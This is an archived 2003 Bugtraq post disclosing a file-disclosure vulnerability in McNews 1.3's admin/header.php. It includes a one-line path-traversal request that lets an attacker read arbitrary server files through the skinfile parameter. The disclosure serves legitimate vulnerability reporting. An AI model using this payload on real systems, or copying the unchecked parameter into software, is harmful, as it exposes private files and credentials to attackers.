McNews 1.3 : File Disclosure Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: bugtraq@securityfocus.com
Subject: McNews 1.3 : File Disclosure Vulnerability
From: Sebastien Lelarge <sebastien.lelarge@tremplin-utc.net>
Date: 26 Sep 2003 08:40:05 -0000


The vulnerable script is <mcnews_root>/admin/header.php

Exploit it with : header.php?voir=1&skinfile=skin/../../../file/to/view

Prev by Date: RE: Ruh-Roh SOBIG.G?
Next by Date: Re: Does VeriSign's SiteFinder service violate the ECPA?
Previous by thread: Tru64 and OpenVMS patch announcements change after next month
Next by thread: Packetstorm started a try2crack of A.R.C.S. Algorithm
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux